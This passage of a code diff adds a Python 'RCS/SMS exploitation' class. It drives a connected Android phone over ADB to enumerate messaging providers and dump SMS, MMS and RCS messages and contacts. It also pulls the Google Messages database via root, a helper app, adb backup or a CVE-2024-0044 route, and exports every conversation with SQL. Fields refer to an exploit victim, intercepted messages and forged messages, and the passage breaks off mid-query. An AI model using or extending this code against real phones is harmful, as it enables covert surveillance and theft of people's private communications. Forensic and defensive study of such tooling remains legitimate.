Messages proprietary providers (may require elevated access) +GMSGS_PROVIDER = 'content://com.google.android.apps.messaging.datamodel.MessagingContentProvider' + +# All known RCS-related content provider URIs to enumerate +ALL_RCS_URIS = [ + 'content://rcs/thread', + 'content://rcs/p2p_thread', + 'content://rcs/group_thread', + 'content://rcs/participant', + 'content://im/messages/', + 'content://com.google.android.apps.messaging/messages', + 'content://com.google.android.apps.messaging.datamodel.MessagingContentProvider', + 'content://com.google.android.ims.provider/', + 'content://com.google.android.gms.ims.provider/', + 'content://com.google.android.rcs.provider/', + 'content://com.samsung.android.messaging/', + 'content://com.samsung.rcs.autoconfigurationprovider/root/*', +] + +# SMS type codes (android.provider.Telephony.Sms constants) +MSG_TYPE_ALL = 0 +MSG_TYPE_INBOX = 1 # received +MSG_TYPE_SENT = 2 # sent +MSG_TYPE_DRAFT = 3 +MSG_TYPE_OUTBOX = 4 +MSG_TYPE_FAILED = 5 +MSG_TYPE_QUEUED = 6 + +# MMS message box codes +MMS_BOX_INBOX = 1 +MMS_BOX_SENT = 2 +MMS_BOX_DRAFT = 3 +MMS_BOX_OUTBOX = 4 + +# bugle_db message_protocol values +PROTOCOL_SMS = 0 +PROTOCOL_MMS = 1 +PROTOCOL_RCS = 2 # Google proprietary — values >= 2 indicate RCS + +# bugle_db paths on device +BUGLE_DB_PATHS = [ + '/data/data/com.google.android.apps.messaging/databases/bugle_db', + '/data/user/0/com.google.android.apps.messaging/databases/bugle_db', + '/data/data/com.android.messaging/databases/bugle_db', +] + +# Telephony provider database +MMSSMS_DB_PATHS = [ + '/data/data/com.android.providers.telephony/databases/mmssms.db', + '/data/user_de/0/com.android.providers.telephony/databases/mmssms.db', +] + +# Samsung messaging databases +SAMSUNG_DB_PATHS = [ + '/data/data/com.samsung.android.messaging/databases/', + '/data/data/com.sec.android.provider.logsprovider/databases/logs.db', +] + +# Known messaging packages +MESSAGING_PACKAGES = [ + 'com.google.android.apps.messaging', # Google Messages + 'com.android.messaging', # AOSP Messages + 'com.samsung.android.messaging', # Samsung Messages + 'com.verizon.messaging.vzmsgs', # Verizon Message+ +] + +# Column projections +SMS_COLUMNS = '_id:thread_id:address:body:date:date_sent:type:read:status:protocol:service_center:person:subject:locked:seen' +MMS_COLUMNS = '_id:thread_id:date:msg_box:sub:sub_cs:ct_l:exp:m_type:read:seen:st' +MMS_PART_COLUMNS = '_id:mid:ct:text:_data:name' + +# Known CVEs affecting RCS/Android messaging +RCS_CVES = { + 'CVE-2023-24033': { + 'severity': 'critical', 'cvss': 9.8, + 'desc': 'Samsung Exynos baseband RCE via RCS SDP accept-type parsing', + 'affected': 'Exynos 5123, 5300, 980, 1080, Auto T5123', + 'type': 'zero-click', 'discoverer': 'Google Project Zero', + 'mitigation': 'Disable Wi-Fi calling and VoLTE; apply March 2023 patches', + }, + 'CVE-2024-0044': { + 'severity': 'high', 'cvss': 7.8, + 'desc': 'Android run-as privilege escalation via newline injection in PackageInstallerService', + 'affected': 'Android 12-13 pre-October 2024 security patch', + 'type': 'local', 'discoverer': 'Meta Red Team X', + 'mitigation': 'Apply October 2024 security patch', + 'exploit_available': True, + }, + 'CVE-2024-31317': { + 'severity': 'high', 'cvss': 7.8, + 'desc': 'Android system_server run-as bypass via command injection', + 'affected': 'Android 12-14 pre-QPR2', + 'type': 'local', 'discoverer': 'Meta Red Team X', + 'mitigation': 'Apply June 2024 security patch', + }, + 'CVE-2024-49415': { + 'severity': 'high', 'cvss': 8.1, + 'desc': 'Samsung libsaped.so zero-click RCE via RCS audio message (OOB write in APE decoder)', + 'affected': 'Samsung Galaxy S23/S24 Android 12-14 pre-December 2024', + 'type': 'zero-click', 'discoverer': 'Natalie Silvanovich (Project Zero)', + 'mitigation': 'Apply December 2024 Samsung security patch', + }, + 'CVE-2025-48593': { + 'severity': 'critical', 'cvss': 9.8, + 'desc': 'Android System component zero-click RCE', + 'affected': 'Android 13, 14, 15, 16', + 'type': 'zero-click', 'discoverer': 'Android Security Team', + 'mitigation': 'Apply November 2025 security patch', + }, + 'CVE-2017-0780': { + 'severity': 'medium', 'cvss': 5.5, + 'desc': 'Android Messages crash via crafted message (DoS)', + 'affected': 'Android 4.4-8.0', + 'type': 'remote', 'discoverer': 'Trend Micro', + 'mitigation': 'Update to patched Android version', + }, +} + +# Phenotype flags for Google Messages debug/verbose logging +PHENOTYPE_FLAGS = { + 'verbose_bug_reports': 'bugle_phenotype__enable_verbose_bug_reports', + 'rcs_diagnostics': 'bugle_phenotype__enable_rcs_diagnostics', + 'debug_mode': 'bugle_phenotype__enable_debug_mode', +} + +# Enterprise archival broadcast +ARCHIVAL_BROADCAST_ACTION = 'GOOGLE_MESSAGES_ARCHIVAL_UPDATE' +ARCHIVAL_URI_EXTRA = 'com.google.android.apps.messaging.EXTRA_ARCHIVAL_URI' + + +# ── RCSTools Class ─────────────────────────────────────────────────────────── + +class RCSTools: + """Comprehensive RCS/SMS exploitation via ADB.""" + + def __init__(self): + self._adb_path: Optional[str] = None + self._data_dir: Path = Path(get_data_dir()) / 'rcs_tools' + self._data_dir.mkdir(parents=True, exist_ok=True) + self._backups_dir: Path = self._data_dir / 'backups' + self._backups_dir.mkdir(parents=True, exist_ok=True) + self._exports_dir: Path = self._data_dir / 'exports' + self._exports_dir.mkdir(parents=True, exist_ok=True) + self._extracted_dir: Path = self._data_dir / 'extracted_dbs' + self._extracted_dir.mkdir(parents=True, exist_ok=True) + self._monitor_thread: Optional[threading.Thread] = None + self._monitor_running = False + self._intercepted: List[Dict[str, Any]] = [] + self._intercepted_lock = threading.Lock() + self._forged_log: List[Dict[str, Any]] = [] + self._cve_exploit_active = False + self._exploit_victim_name: Optional[str] = None + + # ══════════════════════════════════════════════════════════════════════ + # §1 ADB HELPERS + # ══════════════════════════════════════════════════════════════════════ + + def _get_adb(self) -> str: + if self._adb_path is None: + self._adb_path = find_tool('adb') + if not self._adb_path: + raise RuntimeError('adb not found') + return self._adb_path + + def _run_adb(self, command: str, timeout: int = 30) -> str: + adb = self._get_adb() + full_cmd = f'{adb} {command}' + try: + result = subprocess.run( + full_cmd, shell=True, capture_output=True, text=True, timeout=timeout, + ) + if result.returncode != 0 and result.stderr.strip(): + return f'[adb error] {result.stderr.strip()}' + return result.stdout.strip() + except subprocess.TimeoutExpired: + return f'[adb error] Command timed out after {timeout}s' + except Exception as e: + return f'[adb error] {e}' + + def _run_adb_binary(self, command: str, timeout: int = 60) -> Optional[bytes]: + adb = self._get_adb() + full_cmd = f'{adb} {command}' + try: + result = subprocess.run( + full_cmd, shell=True, capture_output=True, timeout=timeout, + ) + if result.returncode != 0: + return None + return result.stdout + except Exception: + return None + + def _run_shizuku(self, command: str, timeout: int = 30) -> str: + escaped = command.replace("'", "'\\''") + return self._run_adb(f"shell sh -c '{escaped}'", timeout=timeout) + + def _shell(self, command: str, timeout: int = 30) -> str: + return self._run_adb(f'shell {command}', timeout=timeout) + + def _content_query(self, uri: str, projection: str = '', where: str = '', + sort: str = '', limit: int = 0) -> List[Dict[str, str]]: + cmd = f'shell content query --uri {uri}' + if projection: + cmd += f' --projection {projection}' + if where: + cmd += f' --where "{where}"' + if sort: + cmd += f' --sort "{sort}"' + output = self._run_adb(cmd, timeout=30) + rows = self._parse_content_query(output) + if limit > 0: + rows = rows[:limit] + return rows + + def _content_insert(self, uri: str, bindings: Dict[str, Any]) -> str: + cmd = f'shell content insert --uri {uri}' + for key, val in bindings.items(): + if val is None: + cmd += f' --bind {key}:s:NULL' + elif isinstance(val, int): + cmd += f' --bind {key}:i:{val}' + elif isinstance(val, float): + cmd += f' --bind {key}:f:{val}' + else: + safe = str(val).replace("'", "'\\''") + cmd += f" --bind {key}:s:'{safe}'" + return self._run_adb(cmd) + + def _content_update(self, uri: str, bindings: Dict[str, Any], where: str = '') -> str: + cmd = f'shell content update --uri {uri}' + for key, val in bindings.items(): + if val is None: + cmd += f' --bind {key}:s:NULL' + elif isinstance(val, int): + cmd += f' --bind {key}:i:{val}' + else: + safe = str(val).replace("'", "'\\''") + cmd += f" --bind {key}:s:'{safe}'" + if where: + cmd += f' --where "{where}"' + return self._run_adb(cmd) + + def _content_delete(self, uri: str, where: str = '') -> str: + cmd = f'shell content delete --uri {uri}' + if where: + cmd += f' --where "{where}"' + return self._run_adb(cmd) + + def _parse_content_query(self, output: str) -> List[Dict[str, str]]: + rows = [] + if not output or output.startswith('[adb error]'): + return rows + for line in output.splitlines(): + line = line.strip() + if not line.startswith('Row:'): + continue + match = re.match(r'Row:\s*\d+\s+(.*)', line) + if not match: + continue + payload = match.group(1) + row = {} + parts = re.split(r',\s+(?=[a-zA-Z_]+=)', payload) + for part in parts: + eq_pos = part.find('=') + if eq_pos == -1: + continue + key = part[:eq_pos].strip() + val = part[eq_pos + 1:].strip() + if val == 'NULL': + val = None + row[key] = val + if row: + rows.append(row) + return rows + + def _is_error(self, output: str) -> bool: + return output.startswith('[adb error]') if output else True + + def _ts_ms(self, dt: Optional[datetime] = None) -> int: + if dt is None: + dt = datetime.now(timezone.utc) + return int(dt.timestamp() * 1000) + + def _format_ts(self, ts_ms) -> str: + try: + ts = int(ts_ms) / 1000 + return datetime.fromtimestamp(ts, tz=timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC') + except (ValueError, TypeError, OSError): + return str(ts_ms) + + # ══════════════════════════════════════════════════════════════════════ + # §2 DEVICE CONNECTION & STATUS + # ══════════════════════════════════════════════════════════════════════ + + def get_connected_device(self) -> Dict[str, Any]: + output = self._run_adb('devices') + devices = [] + for line in output.splitlines(): + line = line.strip() + if line and not line.startswith('List') and not line.startswith('*'): + parts = line.split('\t') + if len(parts) >= 2: + devices.append({'serial': parts[0], 'state': parts[1]}) + if not devices: + return {'connected': False, 'error': 'No devices connected'} + for d in devices: + if d['state'] == 'device': + return {'connected': True, 'serial': d['serial'], 'state': 'device'} + return {'connected': False, 'error': f'Device state: {devices[0]["state"]}'} + + def get_device_info(self) -> Dict[str, Any]: + dev = self.get_connected_device() + if not dev.get('connected'): + return dev + info = { + 'connected': True, + 'serial': dev['serial'], + 'model': self._shell('getprop ro.product.model'), + 'manufacturer': self._shell('getprop ro.product.manufacturer'), + 'android_version': self._shell('getprop ro.build.version.release'), + 'sdk_version': self._shell('getprop ro.build.version.sdk'), + 'security_patch': self._shell('getprop ro.build.version.security_patch'), + 'build_id': self._shell('getprop ro.build.display.id'), + 'brand': self._shell('getprop ro.product.brand'), + 'device': self._shell('getprop ro.product.device'), + 'is_pixel': 'pixel' in self._shell('getprop ro.product.brand').lower() + or 'google' in self._shell('getprop ro.product.manufacturer').lower(), + 'is_samsung': 'samsung' in self._shell('getprop ro.product.manufacturer').lower(), + } + # Check default SMS app + sms_app = self._shell('settings get secure sms_default_application') + info['default_sms_app'] = sms_app if not self._is_error(sms_app) else 'unknown' + return info + + def get_status(self) -> Dict[str, Any]: + dev = self.get_device_info() + if not dev.get('connected'): + return {'ok': False, 'connected': False, 'error': dev.get('error', 'Not connected')} + # Check Shizuku + shizuku = self.check_shizuku_status() + # Check Archon + archon = self.check_archon_installed() + # Check CVE vulnerability + cve_status = self.check_cve_2024_0044() + return { + 'ok': True, + 'connected': True, + 'device': dev, + 'shizuku': shizuku, + 'archon': archon, + 'cve_2024_0044': cve_status, + 'exploit_active': self._cve_exploit_active, + 'monitor_running': self._monitor_running, + 'intercepted_count': len(self._intercepted), + 'forged_count': len(self._forged_log), + } + + def check_shizuku_status(self) -> Dict[str, Any]: + # Check if Shizuku is installed + pm_output = self._shell('pm list packages moe.shizuku.privileged.api') + installed = 'moe.shizuku.privileged.api' in pm_output if not self._is_error(pm_output) else False + if not installed: + pm_output = self._shell('pm list packages rikka.shizuku') + installed = 'rikka.shizuku' in pm_output if not self._is_error(pm_output) else False + # Check if Shizuku service is running + running = False + if installed: + ps_out = self._shell('ps -A | grep shizuku') + running = bool(ps_out and not self._is_error(ps_out) and 'shizuku' in ps_out.lower()) + return {'installed': installed, 'running': running, 'uid': 2000 if running else None} + + def check_archon_installed(self) -> Dict[str, Any]: + pm_output = self._shell('pm list packages com.darkhal.archon') + installed = 'com.darkhal.archon' in pm_output if not self._is_error(pm_output) else False + result = {'installed': installed} + if installed: + # Check version + dump = self._shell('dumpsys package com.darkhal.archon | grep versionName') + if dump and not self._is_error(dump): + m = re.search(r'versionName=(\S+)', dump) + if m: + result['version'] = m.group(1) + # Check if Archon has messaging/RCS permissions + perms = self._shell('dumpsys package com.darkhal.archon | grep "android.permission.READ_SMS"') + result['has_sms_permission'] = 'granted=true' in perms if perms else False + perms2 = self._shell('dumpsys package com.darkhal.archon | grep "android.permission.READ_CONTACTS"') + result['has_contacts_permission'] = 'granted=true' in perms2 if perms2 else False + return result + + def get_security_patch_level(self) -> Dict[str, Any]: + patch = self._shell('getprop ro.build.version.security_patch') + android_ver = self._shell('getprop ro.build.version.release') + sdk = self._shell('getprop ro.build.version.sdk') + result = { + 'security_patch': patch, + 'android_version': android_ver, + 'sdk_version': sdk, + } + # Check if CVE-2024-0044 is exploitable + try: + sdk_int = int(sdk) + if sdk_int in (31, 32, 33): # Android 12, 12L, 13 + if patch and patch < '2024-10-01': + result['cve_2024_0044_vulnerable'] = True + else: + result['cve_2024_0044_vulnerable'] = False + else: + result['cve_2024_0044_vulnerable'] = False + except (ValueError, TypeError): + result['cve_2024_0044_vulnerable'] = False + return result + + def get_default_sms_app(self) -> Dict[str, Any]: + app = self._shell('settings get secure sms_default_application') + if self._is_error(app): + return {'ok': False, 'error': app} + return {'ok': True, 'package': app} + + def set_default_sms_app(self, package: str) -> Dict[str, Any]: + # Verify package exists + pm = self._shell(f'pm list packages {shlex.quote(package)}') + if package not in pm: + return {'ok': False, 'error': f'Package {package} not found'} + result = self._shell(f'settings put secure sms_default_application {shlex.quote(package)}') + if self._is_error(result) and result: + return {'ok': False, 'error': result} + return {'ok': True, 'message': f'Default SMS app set to {package}'} + + # ══════════════════════════════════════════════════════════════════════ + # §3 IMS/RCS DIAGNOSTICS + # ══════════════════════════════════════════════════════════════════════ + + def get_ims_status(self) -> Dict[str, Any]: + output = self._shell('dumpsys telephony_ims') + if self._is_error(output): + # Try alternate service name + output = self._shell('dumpsys telephony.registry') + if self._is_error(output): + return {'ok': False, 'error': 'Cannot query IMS status'} + lines = output.splitlines() + result = {'ok': True, 'raw': output[:5000]} + for line in lines: + line_l = line.strip().lower() + if 'registered' in line_l and 'ims' in line_l: + result['ims_registered'] = 'true' in line_l or 'yes' in line_l + if 'rcs' in line_l and ('enabled' in line_l or 'connected' in line_l): + result['rcs_enabled'] = True + if 'volte' in line_l and 'enabled' in line_l: + result['volte_enabled'] = True + return result + + def get_carrier_config(self) -> Dict[str, Any]: + output = self._shell('dumpsys carrier_config') + if self._is_error(output): + return {'ok': False, 'error': output} + rcs_keys = {} + for line in output.splitlines(): + line = line.strip() + if any(k in line.lower() for k in ['rcs', 'ims', 'uce', 'presence', 'single_registration']): + if '=' in line: + key, _, val = line.partition('=') + rcs_keys[key.strip()] = val.strip() + return {'ok': True, 'rcs_config': rcs_keys, 'raw_length': len(output)} + + def get_rcs_registration_state(self) -> Dict[str, Any]: + # Check Google Messages RCS state via dumpsys + output = self._shell('dumpsys activity service com.google.android.apps.messaging') + rcs_state = 'unknown' + if output and not self._is_error(output): + for line in output.splitlines(): + if 'rcs' in line.lower() and ('state' in line.lower() or 'connected' in line.lower()): + rcs_state = line.strip() + break + # Also try carrier_services + cs_output = self._shell('dumpsys activity service com.google.android.ims') + cs_state = 'unknown' + if cs_output and not self._is_error(cs_output): + for line in cs_output.splitlines(): + if 'provisioned' in line.lower() or 'registered' in line.lower(): + cs_state = line.strip() + break + return { + 'ok': True, + 'messages_rcs_state': rcs_state, + 'carrier_services_state': cs_state, + } + + def enable_verbose_logging(self) -> Dict[str, Any]: + results = {} + # Set Phenotype flag for verbose bug reports (no root needed) + for name, flag in PHENOTYPE_FLAGS.items(): + cmd = ( + f'shell am broadcast ' + f"-a 'com.google.android.gms.phenotype.FLAG_OVERRIDE' " + f'--es package "com.google.android.apps.messaging#com.google.android.apps.messaging" ' + f'--es user "\\*" ' + f'--esa flags "{flag}" ' + f'--esa values "true" ' + f'--esa types "boolean" ' + f'com.google.android.gms' + ) + out = self._run_adb(cmd) + results[name] = 'success' if 'Broadcast completed' in out else out + # Try setting log tags (may require root) + log_tags = ['Bugle', 'BugleDataModel', 'BugleRcs', 'BugleRcsEngine', + 'RcsProvisioning', 'CarrierServices', 'BugleTransport'] + for tag in log_tags: + self._shell(f'setprop log.tag.{tag} VERBOSE') + results['log_tags'] = 'attempted (may require root)' + return {'ok': True, 'results': results} + + def capture_rcs_logs(self, duration: int = 10) -> Dict[str, Any]: + # Clear logcat first + self._shell('logcat -c') + # Capture filtered logs + tags = 'Bugle:V BugleRcs:V RcsProvisioning:V CarrierServices:V BugleRcsEngine:V *:S' + output = self._run_adb(f'shell logcat -d -s {tags}', timeout=duration + 5) + if self._is_error(output): + return {'ok': False, 'error': output} + lines = output.splitlines() + return {'ok': True, 'lines': lines[:500], 'total_lines': len(lines)} + + # ══════════════════════════════════════════════════════════════════════ + # §4 CONTENT PROVIDER EXTRACTION (no root needed) + # ══════════════════════════════════════════════════════════════════════ + + def read_sms_database(self, limit: int = 200) -> List[Dict[str, Any]]: + rows = self._content_query(SMS_URI, projection=SMS_COLUMNS, limit=limit) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + row['protocol_name'] = 'SMS' + msg_type = int(row.get('type', 0)) + row['direction'] = 'incoming' if msg_type == MSG_TYPE_INBOX else 'outgoing' + return rows + + def read_sms_inbox(self, limit: int = 100) -> List[Dict[str, Any]]: + return self._content_query(SMS_INBOX_URI, projection=SMS_COLUMNS, limit=limit) + + def read_sms_sent(self, limit: int = 100) -> List[Dict[str, Any]]: + return self._content_query(SMS_SENT_URI, projection=SMS_COLUMNS, limit=limit) + + def read_mms_database(self, limit: int = 100) -> List[Dict[str, Any]]: + rows = self._content_query(MMS_URI, projection=MMS_COLUMNS, limit=limit) + # Enrich with parts (body text) + for row in rows: + mms_id = row.get('_id') + if mms_id: + parts = self._content_query( + f'content://mms/{mms_id}/part', + projection=MMS_PART_COLUMNS, + ) + row['parts'] = parts + # Extract text body from parts + for p in parts: + if p.get('ct') == 'text/plain' and p.get('text'): + row['body'] = p['text'] + break + if row.get('date'): + row['date_formatted'] = self._format_ts(int(row['date']) * 1000) + return rows + + def read_conversations(self, limit: int = 100) -> List[Dict[str, Any]]: + rows = self._content_query(MMS_SMS_CONVERSATIONS_URI, limit=limit) + return rows + + def read_draft_messages(self) -> List[Dict[str, Any]]: + return self._content_query(MMS_SMS_DRAFT_URI) + + def read_undelivered_messages(self) -> List[Dict[str, Any]]: + return self._content_query(MMS_SMS_UNDELIVERED_URI) + + def read_locked_messages(self) -> List[Dict[str, Any]]: + return self._content_query(MMS_SMS_LOCKED_URI) + + def read_rcs_provider(self) -> Dict[str, Any]: + """Query the AOSP RCS content provider (content://rcs/).""" + results = {} + # Threads + threads = self._content_query(RCS_THREAD_URI) + results['threads'] = threads + results['thread_count'] = len(threads) + # P2P threads + p2p = self._content_query(RCS_P2P_THREAD_URI) + results['p2p_threads'] = p2p + # Group threads + groups = self._content_query(RCS_GROUP_THREAD_URI) + results['group_threads'] = groups + # Participants + participants = self._content_query(RCS_PARTICIPANT_URI) + results['participants'] = participants + results['ok'] = True + return results + + def read_rcs_messages(self, thread_id: Optional[int] = None) -> List[Dict[str, Any]]: + """Read RCS messages from AOSP RCS provider.""" + if thread_id: + uri = RCS_MESSAGE_URI_FMT.format(thread_id=thread_id) + else: + # Try querying all threads and getting messages from each + threads = self._content_query(RCS_THREAD_URI) + all_msgs = [] + for t in threads: + tid = t.get('rcs_thread_id') + if tid: + msgs = self._content_query( + RCS_MESSAGE_URI_FMT.format(thread_id=tid) + ) + for m in msgs: + m['thread_id'] = tid + all_msgs.extend(msgs) + return all_msgs + return self._content_query(uri) + + def read_rcs_participants(self) -> List[Dict[str, Any]]: + return self._content_query(RCS_PARTICIPANT_URI) + + def read_rcs_file_transfers(self, thread_id: int) -> List[Dict[str, Any]]: + uri = RCS_FILE_TRANSFER_URI_FMT.format(thread_id=thread_id) + return self._content_query(uri) + + def get_thread_messages(self, thread_id: int, limit: int = 200) -> List[Dict[str, Any]]: + rows = self._content_query( + SMS_URI, projection=SMS_COLUMNS, + where=f'thread_id={thread_id}', + limit=limit, + ) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + return rows + + def get_messages_by_address(self, address: str, limit: int = 200) -> List[Dict[str, Any]]: + safe_addr = address.replace("'", "''") + rows = self._content_query( + SMS_URI, projection=SMS_COLUMNS, + where=f"address='{safe_addr}'", + limit=limit, + ) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + return rows + + def search_messages(self, keyword: str, limit: int = 100) -> List[Dict[str, Any]]: + safe_kw = keyword.replace("'", "''").replace('%', '\\%') + rows = self._content_query( + SMS_URI, projection=SMS_COLUMNS, + where=f"body LIKE '%{safe_kw}%'", + limit=limit, + ) + for row in rows: + if row.get('date'): + row['date_formatted'] = self._format_ts(row['date']) + return rows + + def enumerate_providers(self) -> Dict[str, Any]: + """Scan all known messaging content providers and report which are accessible.""" + accessible = [] + blocked = [] + for uri in ALL_RCS_URIS: + out = self._run_adb(f'shell content query --uri {uri}', timeout=5) + if self._is_error(out) or 'Permission Denial' in out or 'SecurityException' in out: + blocked.append({'uri': uri, 'error': out[:200] if out else 'no response'}) + elif 'No result found' in out: + accessible.append({'uri': uri, 'status': 'accessible', 'rows': 0}) + else: + row_count = out.count('Row:') + accessible.append({'uri': uri, 'status': 'has_data', 'rows': row_count}) + # Also check standard SMS/MMS + for uri_name, uri in [('SMS', SMS_URI), ('MMS', MMS_URI), ('Conversations', MMS_SMS_CONVERSATIONS_URI)]: + out = self._run_adb(f'shell content query --uri {uri}', timeout=5) + if not self._is_error(out) and 'Permission' not in out: + row_count = out.count('Row:') + accessible.append({'uri': uri, 'status': 'has_data', 'rows': row_count, 'name': uri_name}) + return { + 'ok': True, + 'accessible': accessible, + 'blocked': blocked, + 'total_accessible': len(accessible), + 'total_blocked': len(blocked), + } + + # ══════════════════════════════════════════════════════════════════════ + # §5 BUGLE_DB DIRECT EXTRACTION + # ══════════════════════════════════════════════════════════════════════ + + def extract_bugle_db(self) -> Dict[str, Any]: + """Extract Google Messages bugle_db using best available method. + + Messages are stored as PLAINTEXT in bugle_db — no decryption needed. + The WAL file (bugle_db-wal) may contain recent messages not yet + checkpointed to the main database, so we always capture it. + """ + dev = self.get_connected_device() + if not dev.get('connected'): + return {'ok': False, 'error': 'No device connected'} + + timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') + extract_dir = self._extracted_dir / timestamp + extract_dir.mkdir(parents=True, exist_ok=True) + + # Method 1: Try Archon app relay (if installed and has permissions) + archon = self.check_archon_installed() + if archon.get('installed') and archon.get('has_sms_permission'): + result = self._extract_via_archon(extract_dir) + if result.get('ok'): + return result + + # Method 2: Try CVE-2024-0044 (if vulnerable) + cve = self.check_cve_2024_0044() + if cve.get('vulnerable'): + result = self._extract_via_cve(extract_dir) + if result.get('ok'): + return result + + # Method 3: Try root direct pull + root_check = self._shell('id') + if 'uid=0' in root_check: + result = self._extract_via_root(extract_dir) + if result.get('ok'): + return result + + # Method 4: Try adb backup + result = self._extract_via_adb_backup(extract_dir) + if result.get('ok'): + return result + + # Method 5: Content provider fallback (SMS/MMS only, not full bugle_db) + return { + 'ok': False, + 'error': 'Cannot extract bugle_db directly. Available methods: ' + '(1) Install Archon with SMS permission + Shizuku, ' + '(2) Exploit CVE-2024-0044 on Android 12-13, ' + '(3) Use root access, ' + '(4) Use content provider queries for SMS/MMS only.', + 'fallback': 'content_providers', + } + + def _extract_via_root(self, extract_dir: Path) -> Dict[str, Any]: + """Extract bugle_db via root access.""" + for db_path in BUGLE_DB_PATHS: + check = self._shell(f'su -c "ls {db_path}" 2>/dev/null') + if not self._is_error(check) and 'No such file' not in check: + # Copy to accessible location + staging = '/data/local/tmp/autarch_extract' + self._shell(f'su -c "mkdir -p {staging}"') + for suffix in ['', '-wal', '-shm', '-journal']: + src = f'{db_path}{suffix}' + self._shell(f'su -c "cp {src} {staging}/ 2>/dev/null"') + self._shell(f'su -c "chmod 644 {staging}/{os.path.basename(src)}"') + # Pull files + files_pulled = [] + for suffix in ['', '-wal', '-shm', '-journal']: + fname = f'bugle_db{suffix}' + local_path = str(extract_dir / fname) + pull = self._run_adb(f'pull {staging}/{fname} {local_path}') + if 'bytes' in pull.lower() or os.path.exists(local_path): + files_pulled.append(fname) + # Cleanup + self._shell(f'su -c "rm -rf {staging}"') + if files_pulled: + return { + 'ok': True, 'method': 'root', + 'files': files_pulled, + 'path': str(extract_dir), + 'message': f'Extracted {len(files_pulled)} files via root', + } + return {'ok': False, 'error': 'bugle_db not found via root'} + + def _extract_via_archon(self, extract_dir: Path) -> Dict[str, Any]: + """Extract bugle_db via Archon app's Shizuku-elevated access.""" + # Ask Archon to copy the database to external storage + broadcast = ( + 'shell am broadcast -a com.darkhal.archon.EXTRACT_DB ' + '--es target_package com.google.android.apps.messaging ' + '--es database bugle_db ' + '--es output_dir /sdcard/Download/autarch_extract ' + 'com.darkhal.archon' + ) + result = self._run_adb(broadcast) + if 'Broadcast completed' not in result: + return {'ok': False, 'error': 'Archon broadcast failed'} + + # Wait for extraction to complete + time.sleep(3) + + # Pull files + staging = '/sdcard/Download/autarch_extract' + files_pulled = [] + for suffix in ['', '-wal', '-shm']: + fname = f'bugle_db{suffix}' + local_path = str(extract_dir / fname) + pull = self._run_adb(f'pull {staging}/{fname} {local_path}') + if 'bytes' in pull.lower() or os.path.exists(local_path): + files_pulled.append(fname) + + # Cleanup staging + self._shell(f'rm -rf {staging}') + + if files_pulled: + return { + 'ok': True, 'method': 'archon', + 'files': files_pulled, 'path': str(extract_dir), + 'message': f'Extracted {len(files_pulled)} files via Archon relay', + } + return {'ok': False, 'error': 'Archon extraction produced no files'} + + def _extract_via_adb_backup(self, extract_dir: Path) -> Dict[str, Any]: + """Extract via adb backup (deprecated on Android 12+ but may work).""" + backup_file = str(extract_dir / 'messaging.ab') + # Try backing up Google Messages + result = self._run_adb( + f'backup -nocompress com.google.android.apps.messaging', + timeout=60, + ) + # Also try telephony provider + result2 = self._run_adb( + f'backup -nocompress com.android.providers.telephony', + timeout=60, + ) + # Check if backup file was created + if os.path.exists(backup_file) and os.path.getsize(backup_file) > 100: + return { + 'ok': True, 'method': 'adb_backup', + 'files': ['messaging.ab'], 'path': str(extract_dir), + 'message': 'ADB backup created (may require user confirmation on device)', + 'note': 'Use extract_ab_file() to parse the .ab backup', + } + return {'ok': False, 'error': 'ADB backup not supported or user denied on device'} + + def query_bugle_db(self, sql: str) -> Dict[str, Any]: + """Run SQL query against a locally extracted bugle_db.""" + # Find the most recent extraction + extractions = sorted(self._extracted_dir.iterdir(), reverse=True) + db_path = None + for ext_dir in extractions: + candidate = ext_dir / 'bugle_db' + if candidate.exists(): + db_path = candidate + break + if not db_path: + return {'ok': False, 'error': 'No extracted bugle_db found. Run extract_bugle_db() first.'} + try: + conn = sqlite3.connect(str(db_path)) + conn.row_factory = sqlite3.Row + cursor = conn.execute(sql) + rows = [dict(r) for r in cursor.fetchall()] + conn.close() + return {'ok': True, 'rows': rows, 'count': len(rows), 'db_path': str(db_path)} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def extract_rcs_from_bugle(self) -> Dict[str, Any]: + """Extract only RCS messages from bugle_db (message_protocol >= 2).""" + sql = """ + SELECT m._id, m.conversation_id, m.sent_timestamp, m.received_timestamp, + m.message_protocol, m.message_status, m.read, + p.text AS body, p.content_type, p.uri AS attachment_uri, + c.name AS conversation_name, c.snippet_text, + ppl.normalized_destination AS phone_number, + ppl.full_name AS contact_name, + CASE WHEN ppl.sub_id = -2 THEN 'incoming' ELSE 'outgoing' END AS direction + FROM messages m + LEFT JOIN parts p ON m._id = p.message_id + LEFT JOIN conversations c ON m.conversation_id = c._id + LEFT JOIN conversation_participants cp ON cp.conversation_id = c._id + LEFT JOIN participants ppl ON cp.participant_id = ppl._id + WHERE m.message_protocol >= 2 + ORDER BY m.sent_timestamp DESC + """ + return self.query_bugle_db(sql) + + def extract_conversations_from_bugle(self) -> Dict[str, Any]: + """Full conversation export from bugle_db with all participants.""" + sql = """ + SELECT c._id, c.name, c.snippet_text, c.sort_timestamp, + c.last_read_timestamp, c.participant_count, c.archive_status, + GROUP_CONCAT(ppl.normalized_destination, '; ') AS participants, + GROUP_CONCAT(ppl.full_name, '; ') AS participant_names + FROM conversations c + LEFT JOIN conversation_participants cp ON c._id = cp.conversation_id + LEFT JOIN participants ppl ON cp.participant_id = ppl._id + GROUP BY c._id + ORDER BY c.sort_timestamp DESC + """ + return self.query_bugle_db(sql) + + def extract_message_edits(self) -> Dict[str, Any]: + """Get RCS message edit history from bugle_db.""" + sql = """ + SELECT me.message_id, me.latest_message_id, + me.original_rcs_messages_id, + me.edited_at_timestamp_ms, me.received_at_timestamp_ms, + p.text AS current_text + FROM message_edits me + LEFT JOIN messages m ON me.latest_message_id = m._id + LEFT JOIN parts p ON m._id = p.message_id + ORDER BY me.edited_at_timestamp_ms DESC + """ + return self.query_bugle_db(sql) + + def extract_all_from_bugle(self) -> Dict[str, Any]: + """Complete extraction of all messages, conversations, and participants from bugle_db.""" + result = {} + # Messages + sql_msgs = """ + SELECT m._id, m.conversation_id, m.sent_timestamp, m.received_timestamp, + m.message_protocol, m.message_status, m.read, m.seen, + p.text AS body, p.content_type, p.uri AS attachment_uri, + CASE m.message_protocol + WHEN 0 THEN 'SMS' 